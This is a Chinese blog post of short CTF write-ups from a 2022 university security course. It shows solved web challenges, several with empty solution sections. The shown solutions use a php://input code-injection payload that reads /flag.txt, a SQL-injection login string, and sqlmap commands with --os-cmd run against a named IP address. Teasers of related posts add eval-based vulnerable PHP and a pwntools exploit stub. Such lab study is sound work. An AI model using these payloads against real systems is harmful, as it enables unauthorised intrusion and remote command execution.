22年网安小学期-CTF
木册木兰
- 下载附件,然后根据提示可以看出就是栅栏密码,所以直接解密得到
inputer
- 先源码,这里要用到php://伪协议
- 直接抓包然后改包,构造
php://input,利用system("ls");输出当前目录下所包含的文件,发包后发现可利用
- 那就直接用命令
<?php system("cat /flag.txt");?>获得flag
WEB_blind_exec
LFI
baby_sql
1 | admin' or '1'='1 |
WEB_randnum
WEB_babyphp
easy_getshell
sessionlfi
- 源码中发现页面传参使用get方法,猜测存在sql注入漏洞
测试payload:
sqlmap -u http://218.94.60.213:13198/table.php?id=1 -dbs
爆破数据库,共有4个数据库
使用sqlmap的-os-cmd远程执行命令,看到根目录有flag字样文件
sqlmap -u http://218.94.60.213:13198/table.php?id=1 –os-cmd=”ls /“
最后继续使用远程命令查看得到flag
sqlmap -u http://218.94.60.213:13198/table.php?id=1 –os-cmd=”cat /flag_asflkhasklfhaklshfkjlashfjkas”
happy
- 题目:
- 解题代码:
rsarsa
- 题目:
- 解题代码:
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Crzliang!
相关推荐
2023-04-28
CTFShow-web-命令执行
web29源码: 1234567891011121314151617181920212223 <?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-09-04 00:12:34# @Last Modified by: h1xa# @Last Modified time: 2020-09-04 00:26:48# @email: h1xa@ctfer.com# @link: https://ctfer.com*/error_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);}...
2022-08-09
BUUCTF-web刷题
BUUCTF平台的web题,持续刷。 [极客大挑战 2019]EasySQL 题目: 有登录框,第一联想到利用sql注入,直接尝试万能密码' or '1'='1登录 [HCTF 2018]WarmUp 一进去就只有一个滑稽脸,直接查看源码,得到source.php,进去得到源码 源码: 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist =...
2022-10-13
CTFshow-web21-28
web21 题目: burp抓包利用Intruder模块进行爆破,在根据hint1里的提示知道这是一个tomcat认证爆破,所以标记Authorization: Basic Authorization字段后面的值经过了base64的加密,所以爆破时也要进行相应的加密 Payload sets的设置,字典利用题目给的附件,用户名猜一手admin,最后也是证明猜对了 web22 域名失效了做不了 web23 题目: 源码: 123456789101112131415161718192021222324252627<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-09-03 11:43:51# @Last Modified by: h1xa# @Last Modified time: 2020-09-03 11:56:11# @email: h1xa@ctfer.com# @link:...
2022-07-09
蓝帽杯
电子取证手机取证_1 下载附件解压后打开里面的工具利用搜索功能定位到图片,然后导出 电子取证_2 同理,直接搜索关键词 程序分析_1 下载附件得到一个apk文件,这个可以直接把apk改成zip然后进目录 经过百度得知,apk程序的包名都是在AndroidManifest.xml里面的,但是这个文件不能直接打开,直接打开全是乱码,需要工具来破解 利用AXMLPrinter2.jar工具把 AndroidManifest.xml破解成AndroidManifest.txt文件 cmd下的命令:java -jar AXMLPrinter2.jar AndroidManifest.xml > AndroidManifest.txt 程序分析_2 这题利用aapt工具去获取入口,上一题的程序名称也可以利用这个工具 powershell下的命令(cmd下的有略微不同): .\aapt dump badging C:\Users\alpha\Desktop\蓝帽杯\EXEC.apk >...
2023-06-24
记一次不知名比赛的WP
ReverseReverse_签到找到main函数,就看到了flag Cryptoeasily_Caesar凯撒解码一把梭,key=24 Miscmedium_CTFvalues16进制转文本得到unicode编码 unicode转ascii码得到base64字符串 base64解码得到一个字符串,然后ascii码转文本 difficult_mobile_3jadx打开然后全局搜索base64,找字符串后进行ascii转字符 得到,把ip地址进行包裹提交 Pwneasily_pwn_1程序分析:64位程序,开启了NX保护 代码分析:有一个read函数和write函数,可以发现read函数(这里buf只有0x80字节,而read需要从buf中读取0x200个字节),存在溢出条件。 然后找是否存在后门函数 找到system函数的地址,是简单的栈溢出,找到偏移量为0x80+8,然后覆盖返回地址就可以了 exp: 123456789from pwn import *io = remote('192.168.1.1',9002)#...
2023-05-21
2023-桂电烽台工控CTF
线上异常的工程直接strings查找flag 入侵事件记事本打开,然后根据题目意思,直接搜索password,就能找到准确时间(吐槽一下,题目描述错了) 签到题2 baby_pyc在线网站反编译代码解密脚本 12345678910from Crypto.Cipher import AESimport base64password = b'ragfwQEFAAAAAAAA'iv = b'1234567812345678'encrypted_text = base64.b64decode(b'HHAOD2xCZ0XIJTrOZB4t83wnFsi824jtpiRXI1usbkQ=')aes = AES.new(password,AES.MODE_CBC,iv)decrypted_text =...
评论